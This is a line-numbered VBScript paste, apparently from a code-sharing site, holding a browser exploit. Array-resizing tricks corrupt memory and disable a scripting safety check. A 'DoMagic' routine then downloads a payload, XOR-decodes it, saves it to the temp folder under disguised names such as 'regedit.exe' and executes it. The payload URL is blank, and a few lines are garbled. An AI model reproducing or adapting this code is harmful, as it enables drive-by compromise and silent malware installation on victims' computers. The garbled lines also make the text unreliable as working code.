fork download
  1. Imports System
  3. Function fdg(s, k)
  4. Dim o
  5. Dim j
  6. Dim i
  7. o = ""
  8. j = 1
  9. i = 1
  10. For i = 1 To Len(s)
  11. o = o & Chr(Asc(Mid(s, i, 1)) Xor Asc(Mid(k, j, 1)))
  12. j = j + 1
  13. If Len(k) < j Then j = 1
  14. Next
  15. fdg = o
  16. End Function
  18. Function gfh(a)
  19. Dim cl1, cl2, cl3, pl1, pl2, pl3
  20. Dim l
  21. cl1 = 1
  22. cl2 = 1
  23. cl3 = 1
  24. l = LenB(a)
  25. Do While cl1 <= l
  26. pl3 = pl3 & Chr(AscB(MidB(a, cl1, 1)))
  27. cl1 = cl1 + 1
  28. cl3 = cl3 + 1
  29. If cl3 > 300 Then
  30. pl2 = pl2 & pl3
  31. pl3 = ""
  32. cl3 = 1
  33. cl2 = cl2 + 1
  34. If cl2 > 200 Then
  35. pl1 = pl1 & pl2
  36. pl2 = ""
  37. cl2 = 1
  38. End If
  39. End If
  40. Loop
  41. gfh = pl1 & pl2 & pl3
  42. End Function
  44. Function tra(intLength)
  45. Randomize
  46. Dim strS, intI, eqa
  47. eqa = Array("regedit", "defsrag", "dissdkchk", "diskswtool", "systemrestore")
  48. strS = eqa(Int(Rnd() * UBound(eqa) + 1))
  49. tra = strS
  50. End Function
  52. Sub DoMagic()
  53. On Error Resume Next
  54. Dim gds, jht, ytr
  55. gds = ""
  56. jht = tra(7) & ".exe"
  57. jky = Array("Scripting.FileSystemObject")
  58. Set erq = CreateObject(Join(jky, ""))
  59. vbw = erq.GetSpecialFolder(2) & "\"
  60. bnm = vbw & jht
  61. uoo = Array("WinHttp.WinHttpRequest.5.1")
  62. Set rqq = CreateObject(Join(uoo, ""))
  63. "GET", gds, False
  64. rqq.setRequestHeader "User-Agent", Navigator.UserAgent
  65. rqq.send
  66. If erq.FileExists(bnm) Then
  67. erq.DeleteFile(bnm)
  68. End If
  69. If rqq.Status = 200 Then
  70. Set ite = erq.CreateTextFile(bnm, True)
  71. ite.Write fdg(gfh(rqq.responseBody), "vwMKCwwA")
  72. ite.Close
  73. End If
  75. If erq.FileExists(bnm) Then
  76. cmdline = bnm
  77. nbv = Array("WScript.Shell")
  78. CreateObject(Join(nbv, "")).Run cmdline
  79. CreateObject(Join(nbv, "")).Run "control.exe " & cmdline
  80. End If
  82. End Sub
  83. Dim aa()
  84. Dim ab()
  85. Dim yui
  86. Dim a1
  87. Dim a2
  88. Dim a3
  89. Dim rnda
  90. Dim funclass
  91. Dim nmd
  93. Begin()
  95. Function Begin()
  96. uyr()
  97. If Create() = True Then
  98. nms()
  99. End If
  100. End Function
  102. Function uyr()
  103. Randomize()
  104. ReDim aa(5)
  105. ReDim ab(5)
  106. yui = 13 + 17 * Rnd(6)
  107. a3 = 7 + 3 * Rnd(5)
  108. End Function
  110. Function Create()
  111. On Error Resume Next
  112. Dim i
  113. Create = False
  114. For i = 0 To 800
  115. If mnl( & h8000000) = True Then
  116. Create = True
  117. Exit For
  118. End If
  119. Next
  120. End Function
  122. Sub testaa()
  123. End Sub
  125. Function typ()
  126. On Error Resume Next
  127. i = testaa
  128. i = Null
  129. ReDim Preserve aa(a2)
  130. ab(0) = 0
  131. aa(a1) = i
  132. ab(0) = 6.36598737437801E-314
  133. nmd = chrw(01) & chrw(2176)
  134. nmd = nmd & chrw(01)
  135. nmd = nmd & chrw(00) & chrw(00) & chrw(00) & chrw(00) & chrw(00)
  136. nmd = nmd & chrw(00)
  137. nmd = nmd & chrw(32767) & chrw(00) & chrw(0)
  138. aa(a1 + 2) = nmd
  139. ab(2) = 0.174088534731324E-309
  140. typ = aa(a1)
  141. ReDim Preserve aa(yui)
  142. End Function
  144. Function nms()
  145. On Error Resume Next
  146. i = typ()
  147. i = rtv(i + 8)
  148. i = rtv(i + 16)
  149. j = rtv(i + & h134)
  150. For k = 0 To & h60 Step 4
  151. j = rtv(i + & h120 + k)
  152. If(j = 14) Then
  153. j = 0
  154. ReDim Preserve aa(a2)
  155. aa(a1 + 2)(i + & h11c + k) = ab(4)
  156. ReDim Preserve aa(yui)
  157. j = 0
  158. j = rtv(i + & h120 + k)
  159. Exit For
  160. End If
  161. Next
  162. ab(2) = 1.69759663316747E-313
  163. DoMagic
  164. End Function
  166. Function mnl(addvl)
  167. On Error Resume Next
  168. Dim type1, type2, type3
  169. mnl = False
  170. yui = yui + a3
  171. a1 = yui + 2
  172. a2 = yui + addvl
  173. ReDim Preserve aa(yui)
  174. ReDim ab(yui)
  175. If(IsObject(CreateObject)) Then
  176. ReDim Preserve aa(a2)
  177. End If
  178. type1 = 1
  179. ab(0) = 1.123456789012345678901234567890
  180. aa(yui) = 10
  181. If(IsObject(aa(a1 - 1)) = False) Then
  182. If(VarType(aa(a1 - 1)) < > 0) Then
  183. If(IsObject(aa(a1)) = False) Then
  184. type1 = VarType(aa(a1))
  185. End If
  186. End If
  187. End If
  188. If(type1 = & h2f66) Then
  189. mnl = True
  190. End If
  191. ReDim Preserve aa(yui)
  192. End Function
  194. Function rtv(add)
  195. On Error Resume Next
  196. ReDim Preserve aa(a2)
  197. ab(0) = 0
  198. aa(a1) = add + 4
  199. ab(0) = 0.169759663316747E-312
  200. rtv = LenB(aa(a1))
  201. ab(0) = 0
  202. ReDim Preserve aa(yui)
  203. End Function
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